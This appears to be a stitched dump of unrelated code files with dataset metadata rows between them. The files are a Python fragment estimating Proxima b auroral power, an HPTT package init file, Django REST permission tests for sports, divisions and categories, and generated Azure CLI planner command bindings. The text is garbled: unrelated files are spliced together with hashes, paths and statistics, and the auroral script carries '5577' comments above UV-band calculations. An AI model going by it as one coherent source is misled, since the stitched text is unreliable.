print( ' estimated auroral energetic particle power delivered to auroral regions:\n' )
# quiet magnetosphere
power_out_q = asig.power_calc( nsub, la.norm(vsub), b_t, imf_clock, asig.m_neptune )
print( ' quiet\t\t-\t%.3e' % power_out_q + ' w' )
# stormy magnetosphere
power_out_s = asig.power_calc( nsub, la.norm(vsub), b_t, spcon.pi, asig.m_neptune )
print( ' substorm\t-\t%.3e' % power_out_s + ' w' )
# cme wind conditions
power_out_c = asig.power_calc( nsub, la.norm(vsub), b_t, imf_clock, asig.m_neptune )*cme_scale
print( ' cme\t\t-\t%.3e' % power_out_c + ' w' )
# cme wind conditions + stormy magnetosphere
power_out_cs = asig.power_calc( nsub, la.norm(vsub), b_t, spcon.pi, asig.m_neptune )*cme_scale
print( ' cme+substorm\t-\t%.3e' % power_out_cs + ' w' )
print( '\n estimated auroral power for the oi 5577 a line:\n' )
# 5577 power out for quiet msphere, both hemispheres
out_5577_q = oi_eff*power_out_q*1.e7*e_frac*2*e_5577
print( ' quiet 5577\t-\t%.3e' % out_5577_q + ' w' )
# 5577 power out for stormy msphere, both hemispheres
out_5577_s = oi_eff*power_out_s*1.e7*e_frac*2*e_5577
print( ' substorm 5577\t-\t%.3e' % out_5577_s + ' w' )
# 5577 power out for cme winds, both hemispheres
out_5577_c = oi_eff*power_out_c*1.e7*e_frac*2*e_5577
print( ' cme 5577\t-\t%.3e' % out_5577_c + ' w' )
# 5577 power out for cme winds + stormy msphere, both hemispheres
out_5577_cs = oi_eff*power_out_cs*1.e7*e_frac*2*e_5577
print( ' cme+ss 5577\t-\t%.3e' % out_5577_cs + ' w' )
# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
# power estimated at
print( '\n-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-' )
print( '\n proxima b - super-alfvenic,neptune-like dipole\n' )
print( '-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\n' )
# magnetopause distance
dist = asig.mpause_dist( nsup, la.norm(vsup), asig.m_neptune )
print( ' estimated sub-stellar magnetopause distance: %.3e' % dist + ' m\n' )
# auroral oval
oval = asig.auroral_oval( dist )*1.e4
print( ' estimated auroral oval area: %.3e' % oval + ' cm^2\n' )
# imf clock angle and transverse imf
imf_clock = np.arctan2( abs(bsup[1]), bsup[2] )
b_t = np.sqrt( bsup[1]**2. + bsup[2]**2. )
print( ' estimated auroral energetic particle power delivered to auroral regions:\n' )
# quiet magnetosphere
power_out_q = asig.power_calc( nsup, la.norm(vsup), b_t, imf_clock, asig.m_neptune )
print( ' quiet\t\t-\t%.3e' % power_out_q + ' w' )
# stormy magnetosphere
power_out_s = asig.power_calc( nsup, la.norm(vsup), b_t, spcon.pi, asig.m_neptune )
print( ' substorm\t-\t%.3e' % power_out_s + ' w' )
# cme wind conditions
power_out_c = asig.power_calc( nsup, la.norm(vsup), b_t, imf_clock, asig.m_neptune )*cme_scale
print( ' cme\t\t-\t%.3e' % power_out_c + ' w' )
# cme wind conditions + stormy magnetosphere
power_out_cs = asig.power_calc( nsup, la.norm(vsup), b_t, spcon.pi, asig.m_neptune )*cme_scale
print( ' cme+substorm\t-\t%.3e' % power_out_cs + ' w' )
print( '\n estimated auroral power for the oi 5577 a line:\n' )
# 5577 power out for quiet msphere, both hemispheres
out_5577_q = oi_eff*power_out_q*1.e7*e_frac*2*e_5577
print( ' quiet 5577\t-\t%.3e' % out_5577_q + ' w' )
# 5577 power out for stormy msphere, both hemispheres
out_5577_s = oi_eff*power_out_s*1.e7*e_frac*2*e_5577
print( ' substorm 5577\t-\t%.3e' % out_5577_s + ' w' )
# 5577 power out for cme winds, both hemispheres
out_5577_c = oi_eff*power_out_c*1.e7*e_frac*2*e_5577
print( ' cme 5577\t-\t%.3e' % out_5577_c + ' w' )
# 5577 power out for cme winds + stormy msphere, both hemispheres
out_5577_cs = oi_eff*power_out_cs*1.e7*e_frac*2*e_5577
print( ' cme+ss 5577\t-\t%.3e' % out_5577_cs + ' w' )
# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
# power estimated at
print( '\n-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-' )
print( '\n proxima b - sub-alf neptune mass, radius and dipole\n' )
print( '-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\n' )
# magnetopause distance
dist = asig.mpause_dist( nsub, la.norm(vsub), asig.m_neptune )
print( ' estimated sub-stellar magnetopause distance: %.3e' % dist + ' m\n' )
# auroral oval
oval = asig.auroral_oval( dist, 3.883*asig.r_earth )*1.e4
print( ' estimated auroral oval area: %.3e' % oval + ' cm^2\n' )
# imf clock angle and transverse imf
imf_clock = np.arctan2( abs(bsub[1]), bsub[2] )
b_t = np.sqrt( bsub[1]**2. + bsub[2]**2. )
print( ' estimated auroral energetic particle power delivered to auroral regions:\n' )
# quiet magnetosphere
power_out_q = asig.power_calc( nsub, la.norm(vsub), b_t, imf_clock, asig.m_neptune )
print( ' quiet\t\t-\t%.3e' % power_out_q + ' w' )
# stormy magnetosphere
power_out_s = asig.power_calc( nsub, la.norm(vsub), b_t, spcon.pi, asig.m_neptune )
print( ' substorm\t-\t%.3e' % power_out_s + ' w' )
# cme wind conditions
power_out_c = asig.power_calc( nsub, la.norm(vsub), b_t, imf_clock, asig.m_neptune )*cme_scale
print( ' cme\t\t-\t%.3e' % power_out_c + ' w' )
# cme wind conditions + stormy magnetosphere
power_out_cs = asig.power_calc( nsub, la.norm(vsub), b_t, spcon.pi, asig.m_neptune )*cme_scale
print( ' cme+substorm\t-\t%.3e' % power_out_cs + ' w' )
print( '\n estimated auroral power for the 967-1115 UV band:\n' )
# 5577 power out for quiet msphere, both hemispheres
out_1041_q = uv_eff*power_out_q*1.e7*e_frac*2*e_1041
print( ' quiet 967-1115\t\t-\t%.3e' % out_1041_q + ' w' )
# 5577 power out for stormy msphere, both hemispheres
out_1041_s = uv_eff*power_out_s*1.e7*e_frac*2*e_1041
print( ' substorm 967-1115\t-\t%.3e' % out_1041_s + ' w' )
# 5577 power out for cme winds, both hemispheres
out_1041_c = uv_eff*power_out_c*1.e7*e_frac*2*e_1041
print( ' cme 967-1115\t\t-\t%.3e' % out_1041_c + ' w' )
# 5577 power out for cme winds + stormy msphere, both hemispheres
out_1041_cs = uv_eff*power_out_cs*1.e7*e_frac*2*e_1041
print( ' cme+ss 967-1115\t-\t%.3e' % out_1041_cs + ' w' )
# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
# power estimated at
print( '\n-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-' )
print( '\n proxima b - super alf neptune mass, radius and dipole\n' )
print( '-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\n' )
# magnetopause distance
dist = asig.mpause_dist( nsup, la.norm(vsup), asig.m_neptune )
print( ' estimated sub-stellar magnetopause distance: %.3e' % dist + ' m\n' )
# auroral oval
oval = asig.auroral_oval( dist, 3.883*asig.r_earth )*1.e4
print( ' estimated auroral oval area: %.3e' % oval + ' cm^2\n' )
# imf clock angle and transverse imf
imf_clock = np.arctan2( abs(bsup[1]), bsup[2] )
b_t = np.sqrt( bsup[1]**2. + bsup[2]**2. )
print( ' estimated auroral energetic particle power delivered to auroral regions:\n' )
# quiet magnetosphere
power_out_q = asig.power_calc( nsup, la.norm(vsup), b_t, imf_clock, asig.m_neptune )
print( ' quiet\t\t-\t%.3e' % power_out_q + ' w' )
# stormy magnetosphere
power_out_s = asig.power_calc( nsup, la.norm(vsup), b_t, spcon.pi, asig.m_neptune )
print( ' substorm\t-\t%.3e' % power_out_s + ' w' )
# cme wind conditions
power_out_c = asig.power_calc( nsup, la.norm(vsup), b_t, imf_clock, asig.m_neptune )*cme_scale
print( ' cme\t\t-\t%.3e' % power_out_c + ' w' )
# cme wind conditions + stormy magnetosphere
power_out_cs = asig.power_calc( nsup, la.norm(vsup), b_t, spcon.pi, asig.m_neptune )*cme_scale
print( ' cme+substorm\t-\t%.3e' % power_out_cs + ' w' )
print( '\n estimated auroral power for the 967-1115 UV band:\n' )
# 5577 power out for quiet msphere, both hemispheres
out_1041_q = uv_eff*power_out_q*1.e7*e_frac*2*e_1041
print( ' quiet 967-1115\t\t-\t%.3e' % out_1041_q + ' w' )
# 5577 power out for stormy msphere, both hemispheres
out_1041_s = uv_eff*power_out_s*1.e7*e_frac*2*e_1041
print( ' substorm 967-1115\t-\t%.3e' % out_1041_s + ' w' )
# 5577 power out for cme winds, both hemispheres
out_1041_c = uv_eff*power_out_c*1.e7*e_frac*2*e_1041
print( ' cme 967-1115\t\t-\t%.3e' % out_1041_c + ' w' )
# 5577 power out for cme winds + stormy msphere, both hemispheres
out_1041_cs = uv_eff*power_out_cs*1.e7*e_frac*2*e_1041
print( ' cme+ss 967-1115\t-\t%.3e' % out_1041_cs + ' w' )
| 37.640091
| 94
| 0.63786
| 2,743
| 16,524
| 3.655851
| 0.074736
| 0.08935
| 0.022337
| 0.02513
| 0.906861
| 0.906861
| 0.904467
| 0.901276
| 0.901276
| 0.896789
| 0
| 0.068092
| 0.145001
| 16,524
| 438
| 95
| 37.726027
| 0.641704
| 0.250061
| 0
| 0.782609
| 0
| 0
| 0.308836
| 0.071168
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.028986
| 0
| 0.028986
| 0.512077
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 8
|
aece1877cfa8edd8dd29616a9218c01a68b28c8e
| 152
|
py
|
Python
|
pythonAPI/hptt/__init__.py
|
smavros/hptt
|
e0880608cc12b36b0c21bfda72ae8c9d01a23948
|
[
"BSD-3-Clause"
] | 1
|
2018-07-11T17:49:45.000Z
|
2018-07-11T17:49:45.000Z
|
pythonAPI/hptt/__init__.py
|
smavros/hptt
|
e0880608cc12b36b0c21bfda72ae8c9d01a23948
|
[
"BSD-3-Clause"
] | null | null | null |
pythonAPI/hptt/__init__.py
|
smavros/hptt
|
e0880608cc12b36b0c21bfda72ae8c9d01a23948
|
[
"BSD-3-Clause"
] | 1
|
2018-07-11T17:50:24.000Z
|
2018-07-11T17:50:24.000Z
|
#!/usr/bin/env python
"""HPTT - Tensor Transposition Module based on the C++ High-Performance Tensor Transposition library (HPTT)"""
from hptt import *
| 38
| 110
| 0.75
| 21
| 152
| 5.428571
| 0.809524
| 0.333333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.131579
| 152
| 3
| 111
| 50.666667
| 0.863636
| 0.822368
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
aed8e23ef818993c24c8966b26ad4b1b90af3e8c
| 13,724
|
py
|
Python
|
results/tests/test_views_categories.py
|
JukkaKarvonen/sal-kiti
|
3dcff71552ab323e3c97eccf502c0d72eb683967
|
[
"MIT"
] | 1
|
2021-06-12T08:46:32.000Z
|
2021-06-12T08:46:32.000Z
|
results/tests/test_views_categories.py
|
JukkaKarvonen/sal-kiti
|
3dcff71552ab323e3c97eccf502c0d72eb683967
|
[
"MIT"
] | 8
|
2020-07-01T15:06:52.000Z
|
2022-02-20T09:11:23.000Z
|
results/tests/test_views_categories.py
|
JukkaKarvonen/sal-kiti
|
3dcff71552ab323e3c97eccf502c0d72eb683967
|
[
"MIT"
] | 3
|
2020-03-01T17:02:24.000Z
|
2020-07-05T14:37:59.000Z
|
from django.contrib.auth.models import User
from rest_framework import status
from rest_framework.test import APIRequestFactory
from results.models.categories import Category, Division
from results.models.sports import Sport
from results.tests.factories.categories import CategoryFactory, DivisionFactory, SportFactory
from results.tests.utils import ResultsTestCase
from results.views.categories import CategoryViewSet, DivisionViewSet
from results.views.sports import SportViewSet
class SportTestCase(ResultsTestCase):
    """Permission tests for the Sport API endpoint.

    Anonymous and normal users may read; only staff users and superusers may
    create, update, or delete. The _test_access/_test_update/_test_create/
    _test_delete helpers come from ResultsTestCase.
    """

    def setUp(self):
        self.factory = APIRequestFactory()
        self.user = User.objects.create(username='tester')
        self.staff_user = User.objects.create(username="staffuser", is_staff=True)
        self.superuser = User.objects.create(username="superuser", is_superuser=True)
        self.object = SportFactory.create()
        # Serialized form of the factory object, compared against responses.
        self.data = {'name': self.object.name, 'abbreviation': self.object.abbreviation}
        self.newdata = {'name': 'New Sport', 'abbreviation': 'NewS'}
        self.url = '/api/sports/'
        self.viewset = SportViewSet
        self.model = Sport

    def test_sport_access_list(self):
        # List endpoint is readable without authentication.
        request = self.factory.get(self.url)
        view = self.viewset.as_view(actions={'get': 'list'})
        response = view(request)
        self.assertEqual(response.status_code, status.HTTP_200_OK)

    def test_sport_access_object_without_user(self):
        response = self._test_access(user=None)
        self.assertEqual(response.status_code, status.HTTP_200_OK)
        for key in self.data:
            self.assertEqual(response.data[key], self.data[key])

    def test_sport_access_object_with_normal_user(self):
        response = self._test_access(user=self.user)
        self.assertEqual(response.status_code, status.HTTP_200_OK)
        for key in self.data:
            self.assertEqual(response.data[key], self.data[key])

    def test_sport_update_without_user(self):
        response = self._test_update(user=None, data=self.newdata)
        self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)

    def test_sport_update_with_superuser(self):
        response = self._test_update(user=self.superuser, data=self.newdata)
        self.assertEqual(response.status_code, status.HTTP_200_OK)

    # Renamed from test_sport_update_with_staffruser ("staffruser" typo) to
    # match the staffuser naming used by the other tests in this file.
    def test_sport_update_with_staffuser(self):
        response = self._test_update(user=self.staff_user, data=self.newdata)
        self.assertEqual(response.status_code, status.HTTP_200_OK)

    def test_sport_update_with_normal_user(self):
        response = self._test_update(user=self.user, data=self.newdata)
        self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)

    def test_sport_create_without_user(self):
        response = self._test_create(user=None, data=self.newdata)
        self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)

    def test_sport_create_with_superuser(self):
        response = self._test_create(user=self.superuser, data=self.newdata)
        self.assertEqual(response.status_code, status.HTTP_201_CREATED)
        self.assertEqual(self.model.objects.all().count(), 2)
        for key in self.newdata:
            self.assertEqual(response.data[key], self.newdata[key])

    def test_sport_create_existing_with_superuser(self):
        # Posting the already-existing object's data is accepted as a create.
        response = self._test_create(user=self.superuser, data=self.data)
        self.assertEqual(response.status_code, status.HTTP_201_CREATED)

    def test_sport_create_with_staffuser(self):
        response = self._test_create(user=self.staff_user, data=self.newdata)
        self.assertEqual(response.status_code, status.HTTP_201_CREATED)
        self.assertEqual(self.model.objects.all().count(), 2)
        for key in self.newdata:
            self.assertEqual(response.data[key], self.newdata[key])

    def test_sport_create_existing_with_staffuser(self):
        response = self._test_create(user=self.staff_user, data=self.data)
        self.assertEqual(response.status_code, status.HTTP_201_CREATED)

    def test_sport_create_with_normal_user(self):
        response = self._test_create(user=self.user, data=self.newdata)
        self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)

    def test_sport_delete_with_user(self):
        response = self._test_delete(user=self.user)
        self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)

    def test_sport_delete_with_superuser(self):
        response = self._test_delete(user=self.superuser)
        self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)

    def test_sport_delete_with_staffuser(self):
        response = self._test_delete(user=self.staff_user)
        self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)
class DivisionTestCase(ResultsTestCase):
    """Permission tests for the Division API endpoint.

    Anonymous and normal users may read; only staff users and superusers may
    create, update, or delete. The _test_access/_test_update/_test_create/
    _test_delete helpers come from ResultsTestCase.
    """

    def setUp(self):
        self.factory = APIRequestFactory()
        self.user = User.objects.create(username='tester')
        self.staff_user = User.objects.create(username="staffuser", is_staff=True)
        self.superuser = User.objects.create(username="superuser", is_superuser=True)
        self.object = DivisionFactory.create()
        # Serialized form of the factory object, compared against responses.
        self.data = {'name': self.object.name, 'abbreviation': self.object.abbreviation}
        self.newdata = {'name': 'InnerDiv', 'abbreviation': 'Inner'}
        self.url = '/api/divisions/'
        self.viewset = DivisionViewSet
        self.model = Division

    def test_division_access_list(self):
        # List endpoint is readable without authentication.
        request = self.factory.get(self.url)
        view = self.viewset.as_view(actions={'get': 'list'})
        response = view(request)
        self.assertEqual(response.status_code, status.HTTP_200_OK)

    def test_division_access_object_without_user(self):
        response = self._test_access(user=None)
        self.assertEqual(response.status_code, status.HTTP_200_OK)
        for key in self.data:
            self.assertEqual(response.data[key], self.data[key])

    def test_division_access_object_with_normal_user(self):
        response = self._test_access(user=self.user)
        self.assertEqual(response.status_code, status.HTTP_200_OK)
        for key in self.data:
            self.assertEqual(response.data[key], self.data[key])

    def test_division_update_without_user(self):
        response = self._test_update(user=None, data=self.newdata)
        self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)

    def test_division_update_with_superuser(self):
        response = self._test_update(user=self.superuser, data=self.newdata)
        self.assertEqual(response.status_code, status.HTTP_200_OK)

    # Renamed from test_division_update_with_staffruser ("staffruser" typo)
    # to match the staffuser naming used by the other tests in this file.
    def test_division_update_with_staffuser(self):
        response = self._test_update(user=self.staff_user, data=self.newdata)
        self.assertEqual(response.status_code, status.HTTP_200_OK)

    def test_division_update_with_normal_user(self):
        response = self._test_update(user=self.user, data=self.newdata)
        self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)

    def test_division_create_without_user(self):
        response = self._test_create(user=None, data=self.newdata)
        self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)

    def test_division_create_with_superuser(self):
        response = self._test_create(user=self.superuser, data=self.newdata)
        self.assertEqual(response.status_code, status.HTTP_201_CREATED)
        self.assertEqual(self.model.objects.all().count(), 2)
        for key in self.newdata:
            self.assertEqual(response.data[key], self.newdata[key])

    def test_division_create_existing_with_superuser(self):
        # Posting the already-existing object's data is accepted as a create.
        response = self._test_create(user=self.superuser, data=self.data)
        self.assertEqual(response.status_code, status.HTTP_201_CREATED)

    def test_division_create_with_staffuser(self):
        response = self._test_create(user=self.staff_user, data=self.newdata)
        self.assertEqual(response.status_code, status.HTTP_201_CREATED)
        self.assertEqual(self.model.objects.all().count(), 2)
        for key in self.newdata:
            self.assertEqual(response.data[key], self.newdata[key])

    def test_division_create_existing_with_staffuser(self):
        response = self._test_create(user=self.staff_user, data=self.data)
        self.assertEqual(response.status_code, status.HTTP_201_CREATED)

    def test_division_create_with_normal_user(self):
        response = self._test_create(user=self.user, data=self.newdata)
        self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)

    def test_division_delete_with_user(self):
        response = self._test_delete(user=self.user)
        self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)

    def test_division_delete_with_superuser(self):
        response = self._test_delete(user=self.superuser)
        self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)

    def test_division_delete_with_staffuser(self):
        response = self._test_delete(user=self.staff_user)
        self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)
class CategoryTestCase(ResultsTestCase):
    """Permission tests for the Category API endpoint.

    Read access (list and detail) is public; create, update and delete
    require a staff user or superuser. Fixes a typo in the staff-user
    update test name (``staffruser`` -> ``staffuser``).
    """

    def setUp(self):
        self.factory = APIRequestFactory()
        self.user = User.objects.create(username='tester')
        self.staff_user = User.objects.create(username="staffuser", is_staff=True)
        self.superuser = User.objects.create(username="superuser", is_superuser=True)
        self.object = CategoryFactory.create()
        # Serialized form of the factory object: used to check read payloads
        # and duplicate-create behaviour.
        self.data = {
            'name': self.object.name,
            'abbreviation': self.object.abbreviation,
            'division': self.object.division.pk,
            'min_age': self.object.min_age,
            'max_age': self.object.max_age,
            'gender': self.object.gender,
            'historical': self.object.historical,
        }
        # Minimal valid payload for creating a second category.
        self.newdata = {
            'name': 'Core Seniors',
            'abbreviation': 'CS',
            'division': self.object.division.pk,
            'historical': False,
        }
        self.url = '/api/categories/'
        self.viewset = CategoryViewSet
        self.model = Category

    def test_category_access_list(self):
        """Listing categories requires no authentication."""
        request = self.factory.get(self.url)
        view = self.viewset.as_view(actions={'get': 'list'})
        response = view(request)
        self.assertEqual(response.status_code, status.HTTP_200_OK)

    def test_category_access_object_without_user(self):
        """Anonymous detail access succeeds and returns the full object."""
        response = self._test_access(user=None)
        self.assertEqual(response.status_code, status.HTTP_200_OK)
        for key, value in self.data.items():
            self.assertEqual(response.data[key], value)

    def test_category_access_object_with_normal_user(self):
        """Authenticated detail access succeeds and returns the full object."""
        response = self._test_access(user=self.user)
        self.assertEqual(response.status_code, status.HTTP_200_OK)
        for key, value in self.data.items():
            self.assertEqual(response.data[key], value)

    def test_category_update_without_user(self):
        """Anonymous updates are rejected as unauthenticated."""
        response = self._test_update(user=None, data=self.newdata)
        self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)

    def test_category_update_with_superuser(self):
        """A superuser may update a category."""
        response = self._test_update(user=self.superuser, data=self.newdata)
        self.assertEqual(response.status_code, status.HTTP_200_OK)

    def test_category_update_with_staffuser(self):
        """A staff user may update a category."""
        response = self._test_update(user=self.staff_user, data=self.newdata)
        self.assertEqual(response.status_code, status.HTTP_200_OK)

    def test_category_update_with_normal_user(self):
        """A regular user is forbidden from updating categories."""
        response = self._test_update(user=self.user, data=self.newdata)
        self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)

    def test_category_create_without_user(self):
        """Anonymous creates are rejected as unauthenticated."""
        response = self._test_create(user=None, data=self.newdata)
        self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)

    def test_category_create_with_superuser(self):
        """A superuser may create a category; the payload is echoed back."""
        response = self._test_create(user=self.superuser, data=self.newdata)
        self.assertEqual(response.status_code, status.HTTP_201_CREATED)
        self.assertEqual(self.model.objects.all().count(), 2)
        for key, value in self.newdata.items():
            self.assertEqual(response.data[key], value)

    def test_category_create_existing_with_superuser(self):
        """Re-posting an existing category's data still succeeds with 201."""
        response = self._test_create(user=self.superuser, data=self.data)
        self.assertEqual(response.status_code, status.HTTP_201_CREATED)

    def test_category_create_with_staffuser(self):
        """A staff user may create a category; the payload is echoed back."""
        response = self._test_create(user=self.staff_user, data=self.newdata)
        self.assertEqual(response.status_code, status.HTTP_201_CREATED)
        self.assertEqual(self.model.objects.all().count(), 2)
        for key, value in self.newdata.items():
            self.assertEqual(response.data[key], value)

    def test_category_create_existing_with_staffuser(self):
        """Re-posting an existing category's data still succeeds with 201."""
        response = self._test_create(user=self.staff_user, data=self.data)
        self.assertEqual(response.status_code, status.HTTP_201_CREATED)

    def test_category_create_with_normal_user(self):
        """A regular user is forbidden from creating categories."""
        response = self._test_create(user=self.user, data=self.newdata)
        self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)

    def test_category_delete_with_user(self):
        """A regular user is forbidden from deleting categories."""
        response = self._test_delete(user=self.user)
        self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)

    def test_category_delete_with_superuser(self):
        """A superuser may delete a category (204 No Content)."""
        response = self._test_delete(user=self.superuser)
        self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)

    def test_category_delete_with_staffuser(self):
        """A staff user may delete a category (204 No Content)."""
        response = self._test_delete(user=self.staff_user)
        self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)
| 47.652778
| 106
| 0.723477
| 1,749
| 13,724
| 5.402516
| 0.060606
| 0.104773
| 0.146047
| 0.147317
| 0.901365
| 0.893216
| 0.893216
| 0.893216
| 0.893216
| 0.893216
| 0
| 0.013253
| 0.175313
| 13,724
| 287
| 107
| 47.818815
| 0.821612
| 0
| 0
| 0.642241
| 0
| 0
| 0.0239
| 0
| 0
| 0
| 0
| 0
| 0.284483
| 1
| 0.219828
| false
| 0
| 0.038793
| 0
| 0.271552
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
aeefbc13f46b966cb2e7934075fab600c5acd5b1
| 31,332
|
py
|
Python
|
msgraph/cli/command_modules/planner/azext_planner/generated/commands.py
|
microsoftgraph/msgraph-cli-archived
|
489f70bf4ede1ce67b84bfb31e66da3e4db76062
|
[
"MIT"
] | null | null | null |
msgraph/cli/command_modules/planner/azext_planner/generated/commands.py
|
microsoftgraph/msgraph-cli-archived
|
489f70bf4ede1ce67b84bfb31e66da3e4db76062
|
[
"MIT"
] | 22
|
2022-03-29T22:54:37.000Z
|
2022-03-29T22:55:27.000Z
|
msgraph/cli/command_modules/planner/azext_planner/generated/commands.py
|
microsoftgraph/msgraph-cli-archived
|
489f70bf4ede1ce67b84bfb31e66da3e4db76062
|
[
"MIT"
] | null | null | null |
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
# pylint: disable=too-many-statements
# pylint: disable=too-many-locals
# pylint: disable=bad-continuation
# pylint: disable=line-too-long
from azure.cli.core.commands import CliCommandType
from azext_planner.generated._client_factory import (
cf_group,
cf_group_planner,
cf_group_planner_plan,
cf_group_planner_plan_bucket,
cf_group_planner_plan_bucket_task,
cf_group_planner_plan_task,
cf_planner_planner,
cf_planner,
cf_planner_bucket,
cf_planner_bucket_task,
cf_planner_plan,
cf_planner_plan_bucket,
cf_planner_plan_bucket_task,
cf_planner_plan_task,
cf_planner_task,
cf_user,
cf_user_planner,
cf_user_planner_plan,
cf_user_planner_plan_bucket,
cf_user_planner_plan_bucket_task,
cf_user_planner_plan_task,
cf_user_planner_task,
)
# Every command type below points at one vendored-SDK operations class plus
# the client factory that instantiates it. The operations_tmpl strings vary
# only in the module/class pair, so they are built through one private helper
# instead of 22 near-identical CliCommandType literals.
def _planner_operation_type(module_name, operations_class, factory):
    """Return a CliCommandType bound to one vendored planner operations class."""
    return CliCommandType(
        operations_tmpl='azext_planner.vendored_sdks.planner.operations.%s#%s.{}' % (module_name, operations_class),
        client_factory=factory,
    )


planner_group = _planner_operation_type('_groups_operations', 'GroupsOperations', cf_group)
planner_group_planner = _planner_operation_type('_groups_planner_operations', 'GroupsPlannerOperations', cf_group_planner)
planner_group_planner_plan = _planner_operation_type('_groups_planner_plans_operations', 'GroupsPlannerPlansOperations', cf_group_planner_plan)
planner_group_planner_plan_bucket = _planner_operation_type('_groups_planner_plans_buckets_operations', 'GroupsPlannerPlansBucketsOperations', cf_group_planner_plan_bucket)
planner_group_planner_plan_bucket_task = _planner_operation_type('_groups_planner_plans_buckets_tasks_operations', 'GroupsPlannerPlansBucketsTasksOperations', cf_group_planner_plan_bucket_task)
planner_group_planner_plan_task = _planner_operation_type('_groups_planner_plans_tasks_operations', 'GroupsPlannerPlansTasksOperations', cf_group_planner_plan_task)
planner_planner_planner = _planner_operation_type('_planner_planner_operations', 'PlannerPlannerOperations', cf_planner_planner)
planner_planner = _planner_operation_type('_planner_operations', 'PlannerOperations', cf_planner)
planner_planner_bucket = _planner_operation_type('_planner_buckets_operations', 'PlannerBucketsOperations', cf_planner_bucket)
planner_planner_bucket_task = _planner_operation_type('_planner_buckets_tasks_operations', 'PlannerBucketsTasksOperations', cf_planner_bucket_task)
planner_planner_plan = _planner_operation_type('_planner_plans_operations', 'PlannerPlansOperations', cf_planner_plan)
planner_planner_plan_bucket = _planner_operation_type('_planner_plans_buckets_operations', 'PlannerPlansBucketsOperations', cf_planner_plan_bucket)
planner_planner_plan_bucket_task = _planner_operation_type('_planner_plans_buckets_tasks_operations', 'PlannerPlansBucketsTasksOperations', cf_planner_plan_bucket_task)
planner_planner_plan_task = _planner_operation_type('_planner_plans_tasks_operations', 'PlannerPlansTasksOperations', cf_planner_plan_task)
planner_planner_task = _planner_operation_type('_planner_tasks_operations', 'PlannerTasksOperations', cf_planner_task)
planner_user = _planner_operation_type('_users_operations', 'UsersOperations', cf_user)
planner_user_planner = _planner_operation_type('_users_planner_operations', 'UsersPlannerOperations', cf_user_planner)
planner_user_planner_plan = _planner_operation_type('_users_planner_plans_operations', 'UsersPlannerPlansOperations', cf_user_planner_plan)
planner_user_planner_plan_bucket = _planner_operation_type('_users_planner_plans_buckets_operations', 'UsersPlannerPlansBucketsOperations', cf_user_planner_plan_bucket)
planner_user_planner_plan_bucket_task = _planner_operation_type('_users_planner_plans_buckets_tasks_operations', 'UsersPlannerPlansBucketsTasksOperations', cf_user_planner_plan_bucket_task)
planner_user_planner_plan_task = _planner_operation_type('_users_planner_plans_tasks_operations', 'UsersPlannerPlansTasksOperations', cf_user_planner_plan_task)
